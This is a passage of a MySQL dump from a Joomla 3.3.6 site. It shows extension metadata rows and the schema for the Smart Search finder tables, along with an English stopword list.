reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(450,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(451,'plg_search_tags','plugin','tags','search',0,1,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(503,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"hathor@tarrconsulting.com\",\"authorUrl\":\"http:\\/\\/www.tarrconsulting.com\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(506,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(507,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(600,'English (United Kingdom)','language','en-GB','',0,1,1,1,'{\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.3.1\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,'English (United Kingdom)','language','en-GB','',1,1,1,1,'{\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.3.1\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"September 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.3.6\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0); /*!40000 ALTER TABLE `qo1a2_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_filters` -- DROP TABLE IF EXISTS `qo1a2_finder_filters`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_filters` ( `filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(255) NOT NULL, `alias` varchar(255) NOT NULL, `state` tinyint(1) NOT NULL DEFAULT '1', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL, `created_by_alias` varchar(255) NOT NULL, `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `map_count` int(10) unsigned NOT NULL DEFAULT '0', `data` text NOT NULL, `params` mediumtext, PRIMARY KEY (`filter_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_filters` -- LOCK TABLES `qo1a2_finder_filters` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_filters` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_filters` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links` -- DROP TABLE IF EXISTS `qo1a2_finder_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links` ( `link_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `url` varchar(255) NOT NULL, `route` varchar(255) NOT NULL, `title` varchar(255) DEFAULT NULL, `description` varchar(255) DEFAULT NULL, `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `md5sum` varchar(32) DEFAULT NULL, `published` tinyint(1) NOT NULL DEFAULT '1', `state` int(5) DEFAULT '1', `access` int(5) DEFAULT '0', `language` varchar(8) NOT NULL, `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `list_price` double unsigned NOT NULL DEFAULT '0', `sale_price` double unsigned NOT NULL DEFAULT '0', `type_id` int(11) NOT NULL, `object` mediumblob NOT NULL, PRIMARY KEY (`link_id`), KEY `idx_type` (`type_id`), KEY `idx_title` (`title`), KEY `idx_md5` (`md5sum`), KEY `idx_url` (`url`(75)), KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`), KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links` -- LOCK TABLES `qo1a2_finder_links` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms0` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms0`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms0` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms0` -- LOCK TABLES `qo1a2_finder_links_terms0` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms0` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms0` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms1` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms1`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms1` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms1` -- LOCK TABLES `qo1a2_finder_links_terms1` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms1` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms1` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms2` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms2`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms2` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms2` -- LOCK TABLES `qo1a2_finder_links_terms2` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms2` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms2` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms3` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms3`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms3` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms3` -- LOCK TABLES `qo1a2_finder_links_terms3` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms3` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms3` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms4` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms4`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms4` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms4` -- LOCK TABLES `qo1a2_finder_links_terms4` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms4` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms4` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms5` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms5`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms5` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms5` -- LOCK TABLES `qo1a2_finder_links_terms5` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms5` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms5` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms6` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms6`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms6` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms6` -- LOCK TABLES `qo1a2_finder_links_terms6` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms6` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms6` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms7` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms7`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms7` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms7` -- LOCK TABLES `qo1a2_finder_links_terms7` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms7` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms7` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms8` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms8`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms8` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms8` -- LOCK TABLES `qo1a2_finder_links_terms8` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms8` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms8` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_terms9` -- DROP TABLE IF EXISTS `qo1a2_finder_links_terms9`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_terms9` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_terms9` -- LOCK TABLES `qo1a2_finder_links_terms9` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_terms9` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_terms9` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_termsa` -- DROP TABLE IF EXISTS `qo1a2_finder_links_termsa`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_termsa` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_termsa` -- LOCK TABLES `qo1a2_finder_links_termsa` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_termsa` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_termsa` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_termsb` -- DROP TABLE IF EXISTS `qo1a2_finder_links_termsb`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_termsb` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_termsb` -- LOCK TABLES `qo1a2_finder_links_termsb` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_termsb` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_termsb` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_termsc` -- DROP TABLE IF EXISTS `qo1a2_finder_links_termsc`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_termsc` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_termsc` -- LOCK TABLES `qo1a2_finder_links_termsc` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_termsc` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_termsc` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_termsd` -- DROP TABLE IF EXISTS `qo1a2_finder_links_termsd`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_termsd` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_termsd` -- LOCK TABLES `qo1a2_finder_links_termsd` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_termsd` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_termsd` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_termse` -- DROP TABLE IF EXISTS `qo1a2_finder_links_termse`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_termse` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_termse` -- LOCK TABLES `qo1a2_finder_links_termse` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_termse` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_termse` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_links_termsf` -- DROP TABLE IF EXISTS `qo1a2_finder_links_termsf`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_links_termsf` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_links_termsf` -- LOCK TABLES `qo1a2_finder_links_termsf` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_links_termsf` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_links_termsf` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_taxonomy` -- DROP TABLE IF EXISTS `qo1a2_finder_taxonomy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_taxonomy` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `parent_id` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(255) NOT NULL, `state` tinyint(1) unsigned NOT NULL DEFAULT '1', `access` tinyint(1) unsigned NOT NULL DEFAULT '0', `ordering` tinyint(1) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `parent_id` (`parent_id`), KEY `state` (`state`), KEY `ordering` (`ordering`), KEY `access` (`access`), KEY `idx_parent_published` (`parent_id`,`state`,`access`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_taxonomy` -- LOCK TABLES `qo1a2_finder_taxonomy` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_taxonomy` DISABLE KEYS */; INSERT INTO `qo1a2_finder_taxonomy` VALUES (1,0,'ROOT',0,0,0); /*!40000 ALTER TABLE `qo1a2_finder_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_taxonomy_map` -- DROP TABLE IF EXISTS `qo1a2_finder_taxonomy_map`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_taxonomy_map` ( `link_id` int(10) unsigned NOT NULL, `node_id` int(10) unsigned NOT NULL, PRIMARY KEY (`link_id`,`node_id`), KEY `link_id` (`link_id`), KEY `node_id` (`node_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_taxonomy_map` -- LOCK TABLES `qo1a2_finder_taxonomy_map` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_taxonomy_map` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_taxonomy_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_terms` -- DROP TABLE IF EXISTS `qo1a2_finder_terms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_terms` ( `term_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL DEFAULT '0', `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0', `weight` float unsigned NOT NULL DEFAULT '0', `soundex` varchar(75) NOT NULL, `links` int(10) NOT NULL DEFAULT '0', `language` char(3) NOT NULL DEFAULT '', PRIMARY KEY (`term_id`), UNIQUE KEY `idx_term` (`term`), KEY `idx_term_phrase` (`term`,`phrase`), KEY `idx_stem_phrase` (`stem`,`phrase`), KEY `idx_soundex_phrase` (`soundex`,`phrase`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_terms` -- LOCK TABLES `qo1a2_finder_terms` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_terms` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_terms_common` -- DROP TABLE IF EXISTS `qo1a2_finder_terms_common`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_terms_common` ( `term` varchar(75) NOT NULL, `language` varchar(3) NOT NULL, KEY `idx_word_lang` (`term`,`language`), KEY `idx_lang` (`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_terms_common` -- LOCK TABLES `qo1a2_finder_terms_common` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_terms_common` DISABLE KEYS */; INSERT INTO `qo1a2_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en'); /*!40000 ALTER TABLE `qo1a2_finder_terms_common` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_tokens` -- DROP TABLE IF EXISTS `qo1a2_finder_tokens`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_tokens` ( `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL DEFAULT '0', `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0', `weight` float unsigned NOT NULL DEFAULT '1', `context` tinyint(1) unsigned NOT NULL DEFAULT '2', `language` char(3) NOT NULL DEFAULT '', KEY `idx_word` 